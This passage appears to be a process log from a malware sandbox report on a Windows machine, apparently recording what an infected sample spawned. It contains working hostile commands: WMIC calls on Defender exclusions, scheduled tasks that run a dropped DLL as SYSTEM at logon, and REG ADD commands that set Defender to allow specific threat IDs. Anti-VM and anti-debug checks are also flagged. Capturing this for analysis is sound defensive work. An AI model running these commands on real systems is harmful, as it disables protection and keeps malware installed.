C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
PID:8884 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5360
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\wWgfOb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\xuwAELw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qbSDwEgyNYPZlGA"2⤵PID:6592
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"2⤵PID:5432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4220
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\wTIYFLd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6460
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\TXUcFtU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8568 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\LgJWuxY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:7516 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\MKqvVHY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2104 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"2⤵PID:6536
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:8528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:8652
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5372
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6572
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7136
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5232
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:5456
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8196
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:9144
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8344
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:9044
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7964
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5196
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5464
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵PID:7616
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:8592
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8952
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7152
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6148
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=01⤵PID:9060
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x20c,0x214,0xa56038,0xa56044,0xa560502⤵PID:8440
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"2⤵PID:5324
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream3⤵PID:7616
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x28c,0x290,0x294,0x288,0x298,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06704⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\pyNUeVh.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\pyNUeVh.exe ZO /ATsite_idqwT 525403 /S1⤵PID:6832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4756
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"1⤵PID:4440
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06702⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\pyNUeVh.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\pyNUeVh.exe ZO /ATsite_idqwT 525403 /S1⤵PID:7632
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --lowered-browser1⤵PID:2180
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x29c,0x2a0,0x2a4,0x298,0x2a8,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06702⤵PID:7016
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=1836 /prefetch:22⤵PID:4536
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=1728,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=1916 /prefetch:32⤵PID:1292
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2128,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:82⤵PID:8320
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2704,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:82⤵PID:7728
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2248,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=2772 /prefetch:82⤵PID:7712
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_gx_splash.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_gx_splash.exe" --instance-name=dbff851fa759ccb33e726f883720ae502⤵PID:4308
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2728,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3176 /prefetch:82⤵PID:4824
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on 